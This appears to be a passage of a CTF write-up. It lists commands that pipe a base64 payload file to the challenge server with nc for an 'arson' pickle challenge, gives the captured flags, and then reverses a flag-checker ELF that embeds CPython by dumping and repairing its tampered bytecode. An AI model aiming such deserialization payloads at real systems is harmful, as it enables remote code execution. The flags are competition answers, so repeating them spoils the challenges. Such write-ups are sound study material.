# (base64 out | tr -d '\n'; echo; cat) | python arson.py
# (base64 out | tr -d '\n'; echo; cat) | nc mc.ax 31064
# (base64 out | tr -d '\n'; echo; cat) | nc mc.ax 31065
# arson: hope{pr1ckly_pickl3s}
# reckless arson: hope{m4ny_more_pr1cklier_pickles}

Using zip because the new format is just a zip containing archive/version and archive/data.pkl. You can see this by saving something with torch.save.

rev

better-llvm

This challenge involves reversing an ELF file, which is a flag checker. Running it reveals it embeds CPython.

First, it uses fgets to read a 21-character string and checks if the first character is h. Then, after Py_Initialize(), it uses PyRun_StringFlags to execute:

def dicegang():
    x = input().encode()
    for (a, b) in zip(x, bytes.fromhex('4e434e0a53455f0a584f4b4646530a5e424344410a435e0d4e0a484f0a5e424b5e0a4f4b5953')):
        if a ^ 42 != b:
            return False
        return True

Next, it extracts the dicegang code object, modifying many things, including co_consts and co_code. Finally, it uses PyRun_StringFlags to execute this code to check the flag:

if dicegang():
    print('ok fine you got the flag')
else:
    print('nope >:)')

Clearly, by this point, the dicegang function is no longer the original function. We need to dump the bytecode. The method is simple: replace the string literal with exec(input()) and write it to a new ELF. The only requirement is that the new string length must be less than or equal to the original.

Then, using import dis;dis.dis(dicegang) reveals IndexError: tuple index out of range, indicating something is wrong. Dumping co_code, co_consts, and co_names shows:

          0 LOAD_CONST               4 (4)
          2 LOAD_CONST               0 (0)
          4 ROT_TWO
          6 BINARY_SUBSCR
          8 LOAD_CONST               1 (1)
         10 ROT_TWO
         12 BINARY_SUBSCR
         14 UNPACK_SEQUENCE          2
         16 STORE_FAST               0 (0)
         18 STORE_FAST               1 (1)
         20 LOAD_CONST               5 (5)
         22 LOAD_CONST               6 (6)
         24 BUILD_SLICE              0
         26 LOAD_CONST               0 (0)
         28 ROT_TWO
         30 BINARY_SUBSCR
         32 GET_ITER
    >>   34 FOR_ITER                57 (to 150)
         36 LOAD_CONST               1 (1)
         38 ROT_TWO
         40 BINARY_SUBSCR
         42 UNPACK_SEQUENCE          2
         44 STORE_FAST               2 (2)
         46 STORE_FAST               3 (3)
         48 LOAD_FAST                2 (2)
         50 LOAD_FAST                0 (0)
         52 BINARY_SUBTRACT
         54 STORE_FAST               2 (2)
         56 LOAD_FAST                3 (3)
         58 LOAD_FAST                1 (1)
         60 BINARY_SUBTRACT
         62 STORE_FAST               3 (3)
         64 LOAD_CONST               1 (1)
         66 GET_ITER
    >>   68 FOR_ITER                27 (to 124)
         70 LOAD_CONST               1 (1)
         72 ROT_TWO
         74 BINARY_SUBSCR
         76 UNPACK_SEQUENCE          2
         78 STORE_FAST               4 (4)
         80 STORE_FAST               5 (5)
         82 LOAD_FAST                4 (4)
         84 LOAD_FAST                0 (0)
         86 BINARY_SUBTRACT
         88 STORE_FAST               4 (4)
         90 LOAD_FAST                5 (5)
         92 LOAD_FAST                1 (1)
         94 BINARY_SUBTRACT
         96 STORE_FAST               5 (5)
         98 LOAD_FAST                2 (2)
        100 LOAD_FAST                5 (5)
        102 BINARY_MULTIPLY
        104 LOAD_FAST                3 (3)
        106 LOAD_FAST                4 (4)
        108 BINARY_MULTIPLY
        110 BINARY_SUBTRACT
        112 LOAD_CONST               4 (4)
        114 COMPARE_OP               5 (>=)
        116 POP_JUMP_IF_TRUE        61 (to 122)
        118 LOAD_CONST               2 (2)
        120 RETURN_VALUE
    >>  122 JUMP_ABSOLUTE           34 (to 68)
    >>  124 LOAD_FAST                2 (2)
        126 LOAD_FAST                0 (0)
        128 BINARY_ADD
        130 STORE_FAST               2 (2)
        132 LOAD_FAST                3 (3)
        134 LOAD_FAST                1 (1)
        136 BINARY_ADD
        138 STORE_FAST               3 (3)
        140 LOAD_FAST                2 (2)
        142 STORE_FAST               0 (0)
        144 LOAD_FAST                3 (3)
        146 STORE_FAST               1 (1)
        148 JUMP_ABSOLUTE           17 (to 34)
    >>  150 LOAD_CONST               3 (3)
        152 RETURN_VALUE

co_varnames = ()
co_names = ()
co_consts = ('haaaaaaaaaaaaaaaaaaaa', {'a': (13, 22), 'b': (-13, -9), 'c': (42, 15), 'd': (40, 0), 'e': (-47, 8), 'f': (-20, -29), 'g': (14, -36), 'h': (-1, 48), 'i': (9, -27), 'j': (42, -22), 'k': (-34, -9), 'l': (44, -5), 'm': (46, 1), 'n': (22, -39), 'o': (-25, 42), 'p': (-44, 14), 'q': (8, 14), 'r': (1, 2), 's': (-17, -39), 't': (-14, 31), 'u': (9, 21), 'v': (43, -18), 'w': (40, 12), 'x': (33, 9), 'y': (-28, 25), 'z': (10, -17), 'A': (35, -20), 'B': (4, -32), 'C': (-42, -22), 'D': (21, 19), 'E': (3, 26), 'F': (-8, -6), 'G': (-32, -2), 'H': (-18, -42), 'I': (27, -39), 'J': (-10, 26), 'K': (4, 41), 'L': (-21, 34), 'M': (-27, 10), 'N': (13, -47), 'O': (11, -47), 'P': (-33, -34), 'Q': (-13, -33), 'R': (26, -34), 'S': (36, -29), 'T': (-27, -40), 'U': (-13, -42), 'V': (42, 23), 'W': (-32, -24), 'X': (-12, -23), 'Y': (-29, -39), 'Z': (8, 30), '0': (34, 8), '1': (-37, -13), '2': (25, 38), '3': (-34, -7), '4': (-13, 13), '5': (1, -25), '6': (-30, 33), '7': (27, -10), '8': (-5, 37), '9': (37, 1), '_': (20, -46), '{': (-49, -2), '}': (9, 45)}, False, True, 0, 1, None)

We see the problem is STORE_FAST, LOAD_FAST accessing up to 5, so we need to pad co_varnames to a tuple with 6 names. Then, disassembling works:

dicegang.__code__ = dicegang.__code__.replace(co_varnames=('a','b','c','d','e','f'));import dis;dis.dis(dicegang)